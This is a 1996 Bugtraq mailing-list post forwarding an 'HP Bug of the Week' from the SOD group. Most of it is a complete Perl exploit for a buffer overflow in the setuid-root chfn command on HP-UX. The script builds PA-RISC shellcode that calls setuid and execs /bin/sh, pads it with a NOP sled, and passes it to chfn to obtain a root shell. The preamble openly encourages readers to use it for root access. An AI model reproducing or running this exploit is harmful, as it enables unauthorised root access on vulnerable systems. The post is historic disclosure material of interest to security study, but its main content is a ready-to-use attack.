[3770] in bugtraq
the HP Bug of the Week!
daemon@ATHENA.MIT.EDU (Aleph One)
Mon Dec 9 04:17:25 1996
Date: Mon, 9 Dec 1996 02:47:46 -0600
Reply-To: Aleph One <aleph1@dfw.net>
From: Aleph One <aleph1@dfw.net>
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@NETSPACE.ORG>
From our friends at SOD:
This week: the continuing saga of buffer overflows in setuid root
programs
Amid the struggle of the terrible workaday week, among the lost
broken-hearted keypunching drones, alongside the workers in the
dreaded server farm, Our Hero bravely sends the legally forbidden
datastream across the burning wires toward a cold and lifeless shell
of a shell. The electrons twist! The binary bits battle! The data bus
swerves sharply to avoid hitting the eclectic keywords! Was the script
executed in time to save Our Hero and his lovely Mistress? Were the
exploitable programs still enabled setuid root? Will the buffers spill
onto the stack and leave way to run a small semblance of illicit code?
Of course they will, and you don't have to tune in next week to find
out, either. This week, the chfn command happily runs some code for us
as root, and Otto Sync joins us as an honorary Scriptor with his
exploits written especially for HP's OpenCall Service Control Point
platform for SS7 telephony use -- oh, I don't know how well Alcatel is
going to like this one! So snarf it, pop it open, and suck it down,
and as always remember to start clicking your way to root access with
scripts from those Superhero kind of folks at SOD.
_________________________________________________________________
Caveat Emptor
of.chfn changes uid's, too! script for this week
_________________________________________________________________
#!/usr/bin/perl
use FileHandle;
sub h2cs {
local($stuff)=@_;
local($rv);
while($stuff !~ /^$/) {
$bob=$stuff;
$bob =~ s/^(..).*$/$1/;
$stuff =~ s/^..//;
$rv.=chr(oct("0x${bob}"));
}
return $rv;
}
open(PIPE,"uname -r|");
chop($rev=<PIPE>);
close(PIPE);
$rev =~ s/^.*\.(.*)\..*$/$1/;
if ($rev eq "10") {
$offset=2070;
$prealign="AA";
$postalign="PPPP";
$pcoq=h2cs("7b03A013");
} else {
$offset=2070;
$prealign="AA";
$postalign="PPPP";
$pcoq=h2cs("7b033013");
}
$nop=h2cs("08210280");
$code="";
$code.=h2cs("34160506"); # LDI 643,r22
$code.=h2cs("96d60534"); # SUBI 666,r22,r22
$code.=h2cs("20200801"); # LDIL L%0xc0000004,r1
$code.=h2cs("e420e008"); # BLE 4(sr7,r1)
$code.=h2cs("0b5a029a"); # XOR arg0,arg0,arg0
$code.=h2cs("e83f1ffd"); # BL .+8,r1
$code.=h2cs("08210280"); # NOP
$code.=h2cs("34020102"); # LDI 129,rp
$code.=h2cs("08410402"); # SUB r1,rp,rp
$code.=h2cs("60400162"); # STB r0,177(rp)
$code.=h2cs("b45a0154"); # ADDI 170,rp,arg0
$code.=h2cs("0b390299"); # XOR arg0,arg0,arg0
$code.=h2cs("0b180298"); # XOR arg0,arg0,arg0
$code.=h2cs("341604be"); # LDI 607,r22
$code.=h2cs("20200801"); # LDIL L%0xc0000004,r1
$code.=h2cs("e420e008"); # BLE 4(sr7,r1)
$code.=h2cs("96d60534"); # SUB 666,r22,r22
$code.=h2cs("deadcafe"); # Illegal instruction -- dump core if exec fails
$data="/bin/sh."; # Data stuff
$codedata=$code.$data;
$num=int(($offset-length($code)-length($data)-4)/4);
$pre="$nop"x$num;
$of=$prealign;
$of.=$pre.$code.$data.$postalign.$pcoq;
exec("/usr/bin/chfn","$of");
Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01
